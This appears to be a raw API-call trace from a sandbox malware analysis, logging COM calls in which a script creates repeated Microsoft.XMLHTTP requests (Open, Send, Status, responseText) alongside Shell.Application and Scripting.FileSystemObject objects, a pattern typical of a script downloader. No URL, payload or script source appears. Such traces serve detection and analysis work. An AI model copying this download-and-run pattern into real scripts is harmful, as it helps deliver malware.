	[0243.118] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0243.118] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0243.118] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0244.284] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0244.284] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0244.284] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0244.284] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0244.284] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0244.284] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0244.284] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0244.285] SysStringLen (param_1=0x0) returned 0x0
	[0244.285] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0244.285] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0244.285] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x3967c0) returned 0x0
	[0244.285] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0244.285] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396800) returned 0x0
	[0244.285] ??2@YAPEAX_K@Z () returned 0x62f350
	[0244.285] Shell:IObjectWithSite:SetSite (This=0x396800, pUnkSite=0x62f350) returned 0x0
	[0244.285] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0244.285] Shell:IUnknown:Release (This=0x396800) returned 0x1
	[0244.285] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x3967c0) returned 0x0
	[0244.285] Shell:IUnknown:AddRef (This=0x3967c0) returned 0x3
	[0244.285] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0244.285] SysStringLen (param_1=0x0) returned 0x0
	[0244.285] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f000) returned 0x0
	[0244.287] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0244.287] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f000, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f030) returned 0x0
	[0244.287] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x0
	[0244.287] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0244.287] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f030) returned 0x0
	[0244.287] FileSystemObject:IUnknown:AddRef (This=0x45f030) returned 0x3
	[0245.175] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0245.175] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0245.175] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0245.178] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0245.178] SysStringLen (param_1=0x0) returned 0x0
	[0245.178] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0245.178] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0245.178] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c50) returned 0x0
	[0245.178] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0245.178] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74b8) returned 0x0
	[0245.178] ??2@YAPEAX_K@Z () returned 0x62f330
	[0245.178] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74b8, pUnkSite=0x62f330) 
	[0245.179] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0245.179] XMLHTTPRequest:IUnknown:Release (This=0x49c74b8) returned 0x0
	[0245.179] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c50) returned 0x0
	[0245.179] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c50) returned 0x3
	[0245.179] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0245.179] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0245.182] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0245.182] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0245.182] SysStringLen (param_1=0x0) returned 0x0
	[0245.182] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0245.182] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0245.182] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7200) returned 0x0
	[0245.182] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0245.182] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c72d8) returned 0x0
	[0245.182] ??2@YAPEAX_K@Z () returned 0x62f310
	[0245.182] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c72d8, pUnkSite=0x62f310) 
	[0245.182] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0245.182] XMLHTTPRequest:IUnknown:Release (This=0x49c72d8) returned 0x0
	[0245.182] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7200) returned 0x0
	[0245.183] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7200) returned 0x3
	[0245.183] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0245.183] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7200, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0245.183] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0245.183] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0245.183] SysStringLen (param_1=0x0) returned 0x0
	[0245.183] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0245.183] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0245.183] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0245.183] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0245.183] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7498) returned 0x0
	[0245.183] ??2@YAPEAX_K@Z () returned 0x62f330
	[0245.183] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7498, pUnkSite=0x62f330) 
	[0245.183] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0245.183] XMLHTTPRequest:IUnknown:Release (This=0x49c7498) returned 0x0
	[0245.183] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0245.183] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0245.183] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0245.183] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0245.183] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0245.184] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0245.184] SysStringLen (param_1=0x0) returned 0x0
	[0245.184] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0245.184] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0245.184] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c72b0) returned 0x0
	[0245.184] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0245.184] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72b0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7318) returned 0x0
	[0245.184] ??2@YAPEAX_K@Z () returned 0x62f310
	[0245.184] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7318, pUnkSite=0x62f310) 
	[0245.184] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0245.184] XMLHTTPRequest:IUnknown:Release (This=0x49c7318) returned 0x0
	[0245.184] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72b0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c72b0) returned 0x0
	[0245.184] XMLHTTPRequest:IUnknown:AddRef (This=0x49c72b0) returned 0x3
	[0245.184] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0245.184] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c72b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0245.184] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0245.184] longjmp () 
	[0245.184] longjmp () 
